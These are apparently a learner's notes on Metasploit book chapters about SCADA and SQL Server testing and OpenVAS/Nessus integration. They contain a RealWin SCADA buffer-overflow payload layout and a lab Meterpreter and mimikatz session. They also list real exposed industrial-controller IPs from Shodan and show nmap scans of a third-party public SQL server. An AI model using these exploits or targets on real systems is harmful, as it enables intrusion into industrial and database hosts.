启程
第五章、第六章内容比较少,我将它们合并为一篇笔记:
It’s better to pay a cent for security than a dollar as a ransom.
第五章我们将对各种专业服务进行测试:SCADA/Database。
A chef needs good ingredients to make his best dish, so does a Penetration Test, which need the best of everything to taste a success.
第六章我们将着眼于Metasploit与其他工具的协作。
SCADA基本原理
SCADA全称为Supervisory Control and Data Acquisition,即监控和数据采集系统,是ICS (Industrial Control System)。它如今被广泛应用在堤坝、发电站、炼油厂等大型服务器管理中,往往用于完成高度专业的任务,如水位调度控制、天然气输送、电力网络的控制。
这种SCADA系统的组成部分如下:
- Remote Terminal Unit 将模拟类型的测试值转换为数字信息
- Programmable Logic Controller 集成了输入输出服务器和实时操作系统,工作与RTU类似,可以使用FTP/SSH等网络协议
- Human Machine Interface 与人交互的图形化界面
- Intelligent Electronic Device 即控制器,通过发送命令完成指定任务,如关闭阀门
更多信息,可以参考SCADA系统_百度百科和数据采集与监控系统- 维基百科,自由的百科全书。
拓展:关于stuxnet,可以参考
利用Shodan查找SCADA系统
我们将利用Metasploit结合Shodan去搜索SCADA服务器,所以先注册一个账号,并得到API密钥。
先尝试找出罗克韦尔(Rockwell)自动化技术的SCADA:
msf > use auxiliary/gather/shodan_search
msf auxiliary(gather/shodan_search) > show options
Module options (auxiliary/gather/shodan_search):
Name Current Setting Required Description
---- --------------- -------- -----------
DATABASE false no Add search results to the database
MAXPAGE 1 yes Max amount of pages to collect
OUTFILE no A filename to store the list of IPs
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
QUERY yes Keywords you want to search for
REGEX .* yes Regex search for a specific IP/City/Country/Hostname
SHODAN_APIKEY yes The SHODAN API key
SSL false no Negotiate SSL/TLS for outgoing connections
msf auxiliary(gather/shodan_search) > set QUERY Rockwell
QUERY => Rockwell
msf auxiliary(gather/shodan_search) > set SHODAN_APIKEY xxxxx
SHODAN_APIKEY => xxxxx
msf auxiliary(gather/shodan_search) > run
[*] Total: 7314 on 74 pages. Showing: 1 page(s)
[*] Collecting data, please wait...
Search Results
==============
IP:Port City Country Hostname
------- ---- ------- --------
107.80.248.145:44818 Houston United States mobile-107-80-248-145.mycingular.net
107.85.58.228:44818 N/A United States
108.247.102.219:44818 Collinsville United States 108-247-102-219.lightspeed.stlsmo.sbcglobal.net
12.109.102.64:44818 Parkersburg United States cas-wv-cpe-12-109-102-64.cascable.net
129.21.150.71:44818 Rochester United States plcsetup1.rit.edu
158.75.20.241:44818 Torun Poland 158-75-20-241.minus.uni.torun.pl
166.130.111.122:44818 Atlanta United States mobile-166-130-111-122.mycingular.net
166.130.123.41:44818 Atlanta United States mobile-166-130-123-41.mycingular.net
166.139.129.213:44818 N/A United States 213.sub-166-139-129.myvzw.com
...
[*] Auxiliary module execution completed
结果显示网络上有大量使用Rockwell的服务器。
渗透DATAC Realwin SCADA Server
DATAC Realwin SCADA Server运行在912端口上的服务使用了C语言的springf函数,存在缓冲区溢出漏洞。
作者使用exploit/windows/scada/realwin_scpc_initialize对DATAC Realwin SCADA Server 2.0进行渗透,但是我在网上找不到DATAC Realwin SCADA Server 2.0。后来在DATAC RealWin SCADA Server 1.06 - Remote Buffer Overflow找到了1.06版本。在安装的过程中有些小插曲,一并记录一下。
安装漏洞程序
双击运行安装程序
走到最后安装前,竟然要我输入密码。既然是密码而不是注册码或者序列号,那么很可能这里实质上就是一个简单的字符串比对。于是顺手打开IDA Pro想要定位一下这个输入密码的位置,即使密码没有直接写在里边我也可以尝试把跳转语句改掉,从而绕过这个环节。
然而逆向竟有些困难,根本找不到安装过程中出现的提示字符串。这说明思路可能不对。回过头看它显示7z Setup SFX,于是搜了一下,原来这个包是用7z制作的自解压文件。
那就先把它解压出来:
我们关心的是RwSetupD这个文件,它才是Realwin真正的安装包。我先用PEiD查一下它:
提示是Wise安装包。运行这个包,最后会提醒我输入密码。从Wise UNpacker GUI(Wise解包工具) v0.90A绿色版拿一个解包工具吧:
输入这个密码,安装成功。
运行界面如下:
Exploit
原ExP是有效的,这里就不再给出其验证过程。需要注意的是,它使用的payload是Metasploit的windows/shell/bind_tcp,攻击成功后并不会直接给出shell,需要我们在Msf中使用exploit/multi/handler去连接目标机器的shell。它使用的依然是覆盖SEH的方法,逻辑如下:
shellcode = "..." # windows/shell_bind_tcp
head = "\x64\x12\x54\x6A\x20\x00\x00\x00\xF4\x1F\x00\x00"
junk = "\x41" * 228
next_seh = "\xeb\x06\x90\x90" # overwrites next seh
seh = "\xea\xe3\x02\x40" # seh overwritten at 232 bytes - 4002e3ea
nops = "\x90" * 20 # nop sled
junk2 = "\x42" * (7972 - len(shellcode)) # 1740 bytes for shellcode
s.send(head + junk + next_seh + seh + nops + shellcode + junk2 + "\r\n")
排布一目了然。
我们也不再改写它,直接使用Metasploit中的exploit/windows/scada/realwin_scpc_initialize进行渗透。
msf > use exploit/windows/scada/realwin_scpc_initialize
msf exploit(windows/scada/realwin_scpc_initialize) > set RHOST 172.16.56.134
RHOST => 172.16.56.134
msf exploit(windows/scada/realwin_scpc_initialize) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(windows/scada/realwin_scpc_initialize) > exploit
[*] 172.16.56.134:912 - Trying target Universal...
[*] Started bind TCP handler against 172.16.56.134:4444
[*] Sending stage (179779 bytes) to 172.16.56.134
[*] Meterpreter session 4 opened (172.16.56.1:62985 -> 172.16.56.134:4444) at 2018-10-29 12:06:52 +0800
meterpreter > getuid
Server username: DESTINY-7846DE5\Administrator
接着我们尝试一下mimikatz来查找系统中的明文密码:
meterpreter > load mimikatz
Loading extension mimikatz...Success.
meterpreter > kerberos
[!] Not currently running as SYSTEM
[*] Attempting to getprivs ...
[+] Got SeDebugPrivilege.
[*] Retrieving kerberos credentials
kerberos credentials
====================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;57921 NTLM DESTINY-7846DE5 Administrator
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;996 Negotiate NT AUTHORITY NETWORK SERVICE
0;49264 NTLM
0;999 NTLM WORKGROUP DESTINY-7846DE5$
好吧,看来没有。
SCADA系统通常是基于XP实现的,因此其受攻击的可能性很大。
最后,scadahacker.com 里有大量关于SCADA漏洞的信息。
Database/SQL Server
默认情况下,SQL Server运行在TCP的1433及UDP的1434端口。
信息收集
首先在Shodan上搜索sql server,然后从结果中选取一些IP来用Nmap获取一些信息:
msf > db_nmap -sV -p1433 -Pn 123.21.xxx.xxx
[*] Nmap: Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-29 15:32 CST
[*] Nmap: Nmap scan report for 123.21.114.163
[*] Nmap: Host is up (0.30s latency).
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 1433/tcp open ms-sql-s Microsoft SQL Server 2008 R2 10.50.2500; SP1
[*] Nmap: Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 10.99 seconds
对于UDP端口的扫描需要root权限,所以我们在Msf外部对同一个IP进行扫描:
sudo nmap -sU -sV -p1434 -Pn 123.21.114.163
Password:
Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-29 15:38 CST
Nmap scan report for 123.21.114.163
Host is up.
PORT STATE SERVICE VERSION
1434/udp open|filtered ms-sql-m
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.92 seconds
如果我们使用Nmpa脚本去扫描,结果将更加精确:
sudo nmap -sU --script=ms-sql-info -p1434 -Pn 123.21.114.163
Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-29 15:41 CST
Nmap scan report for 123.21.114.163
Host is up.
PORT STATE SERVICE
1434/udp open|filtered ms-sql-m
Host script results:
| ms-sql-info:
| 123.21.114.163:1433:
| Version:
| name: Microsoft SQL Server 2008 R2 SP1
| number: 10.50.2500.00
| Product: Microsoft SQL Server 2008 R2
| Service pack level: SP1
| Post-SP patches applied: false
|_ TCP port: 1433
Nmap done: 1 IP address (1 host up) scanned in 8.50 seconds
另外,可以使用auxiliary/scanner/mssql/mssql_ping扫描,还可以使用auxiliary/scanner/mssql/mssql_login进行暴力破解。在成功登入账户后,还有mssql_hashdump/mssql_enum/mssql_sql/mssql_exec等各种模块可以使用。
接下来为第六章内容。
灰盒测试
灰盒测试指工程师仅仅掌握了少量环境信息。其流程如下:
为了完成后面的测试,我们首先需要在Kali中安装OpenVAS、Nessus。Kali地址为172.16.56.200,目标机器为Metasploitable2,地址为172.16.56.130。参考的安装教程为OpenVAS:Kali Linux 中的漏洞评估工具。
首先来了解一下Metasploit工作区的概念。它其实类似于IDE中的项目管理,能够把不同的项目区分开。使用工作区可以确保不会将本次测试和其他项目的结果弄混,这一点在我们后面先后用OpenVAS和Nessus进行漏洞扫描时尤为重要。
msf > workspace -h
Usage:
workspace List workspaces
workspace -v List workspaces verbosely
workspace [name] Switch workspace
workspace -a [name] ... Add workspace(s)
workspace -d [name] ... Delete workspace(s)
workspace -D Delete all workspaces
workspace -r <old> <new> Rename workspace
workspace -h Show this help information
OpenVAS与Metasploit协同
Logo很酷!
建立一个OpenVAS工作区并添加插件:
msf > workspace -a OpenVAS_scan
[*] Added workspace: OpenVAS_scan
# 查看当前工作区
msf > workspace
default
* OpenVAS_scan
msf > load openvas
[*] Welcome to OpenVAS integration by kost and averagesecurityguy.
[*]
[*] OpenVAS integration requires a database connection. Once the
[*] database is ready, connect to the OpenVAS server using openvas_connect.
[*] For additional commands use openvas_help.
[*]
[*] Successfully loaded plugin: OpenVAS
将OpenVAS插件与OpenVAS本身连接:
首先启动OpenVAS:
openvas-start
然后在Metasploit中:
# 连接
msf > openvas_connect admin admin localhost 9390 ok
[*] Connecting to OpenVAS instance at localhost:9390 with username admin...
[+] OpenVAS connection successful
# 创建扫描目标
msf > openvas_target_create outer 172.16.56.130 "just test"
[*] 2ea46499-b9d5-4cb8-9984-0f65bdce2c53
[+] OpenVAS list of targets
ID Name Hosts Max Hosts In Use Comment
-- ---- ----- --------- ------ -------
2ea46499-b9d5-4cb8-9984-0f65bdce2c53 outer 172.16.56.130 1 0 just test
# 查看扫描策略
msf > openvas_config_list
OpenVAS list of configs
ID Name
-- ----
085569ce-73ed-11df-83c3-002264764cea empty
2d3f051c-55ba-11e3-bf43-406186ea4fc5 Host Discovery
698f691e-7489-11df-9d8c-002264764cea Full and fast ultimate
708f25c4-7489-11df-8094-002264764cea Full and very deep
74db13d6-7489-11df-91b9-002264764cea Full and very deep ultimate
8715c877-47a0-438d-98a3-27c7a6ab2196 Discovery
bbca7412-a950-11e3-9109-406186ea4fc5 System Discovery
daba56c8-73ec-11df-a475-002264764cea Full and fast
# 创建扫描任务
msf > openvas_task_create test_scan test daba56c8-73ec-11df-a475-002264764cea 2ea46499-b9d5-4cb8-9984-0f65bdce2c53
[*] ab63990d-bdb2-4c5c-bf39-981beaefc612
[+] OpenVAS list of tasks
ID Name Comment Status Progress
-- ---- ------- ------ --------
ab63990d-bdb2-4c5c-bf39-981beaefc612 test_scan test New -1
# 扫描
msf > openvas_task_start ab63990d-bdb2-4c5c-bf39-981beaefc612
Nessus与Metasploit协同
首先进入WebUI创建一个Policy:
如上图,我们已经知道目标为Linux,所以可以禁用一些其他操作系统的扫描插件。另外,如果显示没有插件可用,需要在命令行中:
/opt/nessus/sbin/nessuscli update
然后进入Msf:
msf > workspace -a Nessus_scan
[*] Added workspace: Nessus_scan
msf > load nessus
[*] Nessus Bridge for Metasploit
[*] Type nessus_help for a command listing
[*] Successfully loaded plugin: Nessus
# 连接
msf > nessus_connect root:root123@127.0.0.1:8834
[*] Connecting to https://127.0.0.1:8834/ as root
[*] User root authenticated successfully.
# 查看扫描策略
msf > nessus_policy_list
Policy ID Name Policy UUID
--------- ---- -----------
15 mybasic ad629e16-03b6-8c1d-cef6-ef8c9dd3c658d24bd260ef5f9e66
# 创建扫描任务
msf > nessus_scan_new ad629e16-03b6-8c1d-cef6-ef8c9dd3c658d24bd260ef5f9e66 ip130-Scan "First Scan" 172.16.56.130
[*] Creating scan from policy number ad629e16-03b6-8c1d-cef6-ef8c9dd3c658d24bd260ef5f9e66, called ip130-Scan - First Scan and scanning 172.16.56.130
[*] New scan added
[*] Use nessus_scan_launch 17 to launch the scan
Scan ID Scanner ID Policy ID Targets Owner
------- ---------- --------- ------- -----
17 1 16 172.16.56.130 root
# 扫描
msf > nessus_scan_launch 17
[+] Scan ID 17 successfully launched. The Scan UUID is e7ebc374-8a35-d416-5b9c-a33eb462aecb88cb0150c864700d
总结
第五章还有些料,第六章主要是插件的使用方法,不必深究。